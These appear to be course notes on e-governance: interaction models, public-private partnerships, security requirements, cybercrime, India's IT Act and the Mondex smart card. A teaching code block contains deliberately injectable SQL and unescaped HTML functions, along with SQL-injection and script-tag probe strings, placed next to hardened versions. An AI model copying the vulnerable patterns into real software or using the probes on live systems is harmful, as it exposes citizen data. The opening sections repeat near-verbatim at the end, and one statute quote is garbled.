Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with the definition of e-governance, is that there is no provision for governance of the ICTs themselves. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached them. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, which illustrates that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be either horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. a service centre, an unattended kiosk, or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here, e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer, and like any organization it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally, but not always, involving:
  - Long Term Contracts
  - User Charges and/or Payments flowing between the Parties
  - Shared Investments, but Mainly Private
  - Risk Sharing by the Parties
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations
• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition, For and In the Market


The Need to Set the Right Priorities

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:
• Shared goals
• Shared resources (time, money, expertise, people)
• Shared risks
• Shared benefits

Benefits
• Expedited project completion
• Project cost savings
• Improved quality
• Use of private resources
• Access to new sources of private capital

Two Major Steps
• Crafting the Partnership
• Implementing the Partnership

Project Management

Six Distinct Phases

1 Genesis
  - What's the need?
  - What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
  - Is there a need for a Public/Private Partnership?

2 Preliminary Project Definition
  - Feasibility: Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
  - Market Research
  - Economic/Financial Analysis
  - Program, Budget and Schedule
  - Risk Analysis

3 Plan and Test
  - Final project definition
  - What is the best way to complete the project?
  - Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback and economics?
  - Master Schedule/Budget
  - Political Climate
  - Any potential "fatal flaws" that could derail the project?

4 Procurement and Contracting
  - How do you choose and contract with the best-value private partner?
  - What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
  - What do current statutes allow?
  - Procurement Approach: Sole Source, RFP, Low Bid
  - Risk Allocation between Public and Private Partners
  - Structuring of Contract / Risks and Rewards

5 Implement
  - Environmental
  - Design
  - Permitting
  - Construction
  - Commissioning and Administration

6 Operate
  - Startup
  - Monitoring
  - Assessment
  - Enhancement
  - Contract Modifications
  - Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2 INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures, by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:
- understanding an organization's information security requirements and the need to establish policy and objectives for information security
- implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks
- monitoring and reviewing the performance and effectiveness of the ISMS
- continual improvement based on objective measurement

Data security requires a set of security requirements:
- Authentication: capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.
- Authorization: capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.
- Confidentiality: capability to prevent unauthorized access to information.
- Integrity: capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
- Traceability: capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.
- Non-repudiation: capability to prevent the person or system intervening in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:
- Protecting premises, equipment and systems software, including input-output units
- Protecting software applications used to process personal data
- Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks
- Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data
- Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and of the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Despite the fact that trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3 INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks use techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:
- Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
- Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness
- Continually improve its control environment
- Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
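As an added illustration (not from the original notes) of the two vulnerability classes the survey cites, the block below contrasts a string-built citizen lookup with a parameterized one, and shows the output encoding that keeps user-supplied text from being rendered as HTML. The citizen table, the record ids and the probe inputs are constructed sample data.

```python
import html
import sqlite3

# Constructed sample data standing in for a citizen-records table of an
# e-Government portal; none of these are real records.
CITIZENS = [
    ("C-1001", "Asha Verma", "asha@example.invalid"),
    ("C-1002", "Ravi O'Brien", "ravi@example.invalid"),
    ("C-1003", "Meera Iyer", "meera@example.invalid"),
]


def open_db() -> sqlite3.Connection:
    """Create an in-memory database seeded with the constructed records."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE citizens (cid TEXT PRIMARY KEY, name TEXT, email TEXT)"
    )
    conn.executemany("INSERT INTO citizens VALUES (?, ?, ?)", CITIZENS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, cid: str) -> list:
    """Builds the WHERE clause by concatenation: the portal input becomes
    part of the SQL grammar, which is the SQL injection defect."""
    sql = "SELECT cid, name, email FROM citizens WHERE cid = '" + cid + "'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, cid: str) -> list:
    """Passes the input as a bound parameter: the driver sends it as data,
    so quotes or keywords inside it can never change the query."""
    sql = "SELECT cid, name, email FROM citizens WHERE cid = ?"
    return conn.execute(sql, (cid,)).fetchall()


def render_name_vulnerable(name: str) -> str:
    """Interpolates a stored value straight into markup; if the value was
    attacker-controlled this is a stored XSS."""
    return "<td>" + name + "</td>"


def render_name_hardened(name: str) -> str:
    """Escapes <, >, &, and quotes so the browser displays the text
    instead of interpreting it as markup."""
    return "<td>" + html.escape(name, quote=True) + "</td>"


def run_demo() -> dict:
    """Run both lookups and both renderers on a normal id and on a
    constructed probe input; return the observations for inspection."""
    conn = open_db()
    # Constructed probe: a quote followed by an always-true condition.
    probe = "x' OR '1'='1"
    markup_probe = "<script>alert(1)</script>"
    results = {
        "normal_vuln_rows": len(lookup_vulnerable(conn, "C-1002")),
        "normal_safe_rows": len(lookup_hardened(conn, "C-1002")),
        # the concatenated query returns the whole table for the probe ...
        "probe_vuln_rows": len(lookup_vulnerable(conn, probe)),
        # ... while the parameterized query looks for a literal id and finds none
        "probe_safe_rows": len(lookup_hardened(conn, probe)),
        "xss_vuln": render_name_vulnerable(markup_probe),
        "xss_safe": render_name_hardened(markup_probe),
    }
    conn.close()
    return results
```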

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:
- 121 Million Internet Users
- 65 Million Active Internet Users, up by 28% from 51 million in 2010
- 50 Million users shop online on Ecommerce and Online Shopping Sites
- 46+ Million Social Network Users
- 346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause Wrongful Loss or Damage to the public or any person, Destroys or Deletes or Alters any Information Residing in a Computer Resource or diminishes its value or utility or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:
- Secures Access
- Downloads, Copies or extracts any data, computer database or any information
- Introduces or causes to be introduced any Virus or Contaminant
- Disrupts or causes disruption
- Denies or causes denial of access to any person
- Provides any assistance to any person to facilitate access
- Charges the services availed of by a person to the account of another person by Tampering with or Manipulating any Computer, Computer System or Computer Network
shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 43

- Destroys, Deletes or Alters any Information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means
- Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:
- Any information that is grossly offensive or has menacing character; or
- Any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
- Any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages,
shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1 Legal recognition of electronic documents
2 Legal recognition of digital signatures
3 Offences and contraventions
4 Justice dispensation systems for cybercrimes

Offences

Section 65
Offence: Tampering with computer source documents. Intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force.
Punishment: Imprisonment up to three years or/and with fine up to 2 lakh rupees.

Section 66
Offence: Hacking.
Punishment: Imprisonment up to three years or/and with fine up to 5 lakh rupees.

Section 66-A
Offence: Sending offensive message through electronic means. Sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages.
Punishment: Imprisonment up to three years and with fine.

Criticisms

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


Smart Card Processing

Smart Card Applications:
- Ticketless travel: Seoul bus system, 4M cards, 1B transactions since 1996; planned for the SF Bay Area system
- Authentication, ID
- Medical records
- Ecash
- Store loyalty programs
- Personal profiles
- Government: Licenses
- Mall parking
- Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Features:
- Direct transfer of electronic money between two cards
- Transfer of electronic money over the Internet or telephone networks, etc.
- Keeps transaction records
- Password protection and "lock card" functions
- Portable balance finder to check balance
- Supports multiple currencies


ADVANTAGES

CONSUMER –
• Convenience
• Accessibility
• On-chip record of recent transactions
• Home load
• Internet purchases

MERCHANT –
• Reliable off-line payment
• Higher security
• Low transaction cost
• Reduced cash handling

FINANCIAL INSTITUTION –
• Strengthened customer relationships
• New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia-Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? –

Principles protected:
o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information


Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information
o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate
o load and unload are online
o a rolling log of 10 transactions provides the exact spend and retailer name

Safeguarding personal information
o firewalls in Multos between applications (ITSEC 6 designation)
o transaction data passed to the retailer is deliberately limited
o individual transaction data is not collected by banks; Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are actually recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of the limited memory in Mondex smart cards. This means that


significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
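
The audit problem described above (a chip that keeps only a rolling record of ten transactions, so entries are overwritten before the bank can retrieve them) is easy to see in a small model. The following is an added illustration, not Mondex's or MasterCard's own code: a toy stored-value purse with offline card-to-card transfers, and a bank-side reconciliation that detects which entries were lost before upload. The card IDs, balances and log capacity are constructed assumptions.

```python
"""Toy model of a Mondex-style purse (added example, not Mondex's own code).
All card IDs, balances and the log capacity are constructed assumptions."""
from collections import deque
from dataclasses import dataclass, field

LOG_CAPACITY = 10  # the "rolling 10 transactions" the notes attribute to the chip


@dataclass
class Purse:
    card_id: str
    balance: int                 # value in the smallest currency unit, no floats
    seq: int = 0                 # per-card transaction counter, never reset
    locked: bool = False         # the "lock card" feature from the feature list
    log: deque = field(default_factory=lambda: deque(maxlen=LOG_CAPACITY))

    def record(self, kind: str, counterparty: str, amount: int) -> int:
        """Append a log entry. deque(maxlen=...) silently drops the oldest entry
        once full, which is exactly the overflow that loses data before upload."""
        self.seq += 1
        self.log.append((self.seq, kind, counterparty, amount))
        return self.seq


def transfer(payer: Purse, payee: Purse, amount: int) -> bool:
    """Offline card-to-card transfer: only the two chips take part, no bank."""
    if payer.locked or payee.locked or amount <= 0 or payer.balance < amount:
        return False
    payer.balance -= amount
    payee.balance += amount
    payer.record("debit", payee.card_id, amount)
    payee.record("credit", payer.card_id, amount)
    return True


def upload_log(purse: Purse) -> list:
    """What the bank receives when the card next meets an ATM or the retailer
    uploads: only the entries still held on the chip."""
    return list(purse.log)


def find_audit_gaps(purse_seq: int, uploaded: list, last_known_seq: int = 0) -> list:
    """Bank-side reconciliation: the card's counter says how many transactions
    happened; any sequence number missing from the upload was overwritten on
    the chip and can no longer be audited. last_known_seq is the highest
    number the bank already holds from a previous upload."""
    seen = {entry[0] for entry in uploaded}
    return [s for s in range(last_known_seq + 1, purse_seq + 1) if s not in seen]


def simulate(n_purchases: int, amount: int = 100) -> dict:
    """Run n purchases from a consumer card to a retailer card between two
    uploads and report what the bank can and cannot reconstruct afterwards."""
    consumer = Purse("CARD-0001", balance=5000)   # constructed sample cards
    retailer = Purse("SHOP-0042", balance=0)
    done = sum(transfer(consumer, retailer, amount) for _ in range(n_purchases))
    uploaded = upload_log(consumer)
    return {
        "completed": done,
        "consumer_balance": consumer.balance,
        "retailer_balance": retailer.balance,
        "entries_uploaded": len(uploaded),
        "lost_sequence_numbers": find_audit_gaps(consumer.seq, uploaded),
    }


if __name__ == "__main__":
    # Twelve purchases before the next upload: the first two are gone for good.
    for key, value in simulate(12).items():
        print(f"{key}: {value}")
```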

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back-office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with a definition of e-governance, is that there is no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these


concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP-based e-governance projects. Each project had mammoth state-wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been delivered. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

